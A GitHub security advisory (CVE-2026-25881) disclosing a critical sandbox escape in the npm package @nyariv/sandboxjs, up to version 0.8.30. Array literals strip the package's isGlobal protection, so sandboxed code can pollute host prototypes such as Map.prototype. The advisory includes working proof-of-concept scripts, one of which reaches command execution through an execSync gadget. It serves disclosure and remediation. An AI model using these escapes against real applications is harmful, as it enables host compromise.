Skip to content

@nyariv/sandboxjs has host prototype pollution from sandbox via array intermediary (sandbox escape)

Critical severity GitHub Reviewed Published Feb 8, 2026 in nyariv/SandboxJS • Updated Feb 10, 2026

Package

npm @nyariv/sandboxjs (npm)

Affected versions

<= 0.8.30

Patched versions

0.8.31

Description

Summary

A sandbox escape vulnerability allows sandboxed code to mutate host built-in prototypes by laundering the isGlobal protection flag through array literal intermediaries. When a global prototype reference (e.g., Map.prototype, Set.prototype) is placed into an array and retrieved, the isGlobal taint is stripped, permitting direct prototype mutation from within the sandbox. This results in persistent host-side prototype pollution and may enable RCE in applications that use polluted properties in sensitive sinks (example gadget: execSync(obj.cmd)).

Details

Root Cause:

The sandbox implements a protection mechanism using the isGlobal flag in the Prop class to prevent modification of global objects and their prototypes. However, this taint tracking is lost when values pass through array/object literal creation.

Vulnerable Code Path src/executor.ts(L559-L571):

addOps(LispType.CreateArray, (exec, done, ticks, a, b: Lisp[], obj, context, scope) => {
  const items = (b as LispItem[])
    .map((item) => {
      if (item instanceof SpreadArray) {
        return [...item.item];
      } else {
        return item;
      }
    })
    .flat()
    .map((item) => valueOrProp(item, context));  // <- isGlobal flag lost here
  done(undefined, items);
});

Exploitation Flow:

Sandboxed code: const m=[Map.prototype][0]
              ↓
Array creation: isGlobal taint stripped via valueOrProp()
              ↓
Prototype mutation: m.cmd='id' (host prototype polluted)
              ↓
Host-side impact: new Map().cmd === 'id' (persistent)
              ↓
RCE (application-dependent): host code calls execSync(obj.cmd)

Protection Bypass Location src/utils.ts(L380-L385):

set(key: string, val: unknown) {
  // ...
  if (prop.isGlobal) {  // <- This check is bypassed
    throw new SandboxError(`Cannot override global variable '${key}'`);
  }
  (prop.context as any)[prop.prop] = val;
  return prop;
}

When the prototype is accessed via array retrieval, the isGlobal flag is no longer set, so this protection is never triggered.

PoC

Prototype pollution via array intermediary:

const Sandbox = require('@nyariv/sandboxjs').default;
const sandbox = new Sandbox();

sandbox.compile(`
  const arr=[Map.prototype];
  const p=arr[0];
  p.polluted='pwned';
  return 'done';
`)().run();

console.log('polluted' in ({}), new Map().polluted);

Observed output: false pwned

Overwrite Set.prototype.has:

const Sandbox = require('@nyariv/sandboxjs').default;
const sandbox = new Sandbox();

sandbox.compile(`
  const s=[Set.prototype][0];
  s.has=isFinite;
  return 'done';
`)().run();

console.log('has overwritten:', Set.prototype.has === isFinite);

Observed output: has overwritten: true

RCE via host gadget (prototype pollution -> execSync):

const Sandbox = require('@nyariv/sandboxjs').default;
const { execSync } = require('child_process');
const sandbox = new Sandbox();

sandbox.compile(`
  const m=[Map.prototype][0];
  m.cmd='id';
  return 'done';
`)().run();

const obj = new Map();
const out = execSync(obj.cmd, { encoding: 'utf8' }).trim();
console.log(out);

Observed output: uid=501(user) gid=20(staff) groups=20(staff),...

Impact

This is a sandbox escape: untrusted sandboxed code can persistently mutate host built-in prototypes (e.g., Map.prototype, Set.prototype), breaking isolation and impacting subsequent host execution. RCE is possible in applications that later use attacker-controlled (polluted) properties in sensitive sinks (e.g., passing obj.cmd to child_process.execSync).

Affected Systems: any application using @nyariv/sandboxjs to execute untrusted JavaScript.

Remediation

  • Preserve isGlobal protection across array/object literal creation (do not unwrap Prop into raw values in a way that drops the global/prototype taint).
  • Add a hard block on writes to built-in prototypes (e.g., Map.prototype, Set.prototype, etc.) even if they are obtained indirectly through literals.
  • Defense-in-depth: freeze built-in prototypes in the host process before running untrusted code (may be breaking for some consumers).

References

@nyariv nyariv published to nyariv/SandboxJS Feb 8, 2026
Published by the National Vulnerability Database Feb 9, 2026
Published to the GitHub Advisory Database Feb 10, 2026
Reviewed Feb 10, 2026
Last updated Feb 10, 2026

Severity

Critical

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
High
Privileges required
None
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(30th percentile)

Weaknesses

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype. Learn more on MITRE.

CVE ID

CVE-2026-25881

GHSA ID

GHSA-ww7g-4gwx-m7wj

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.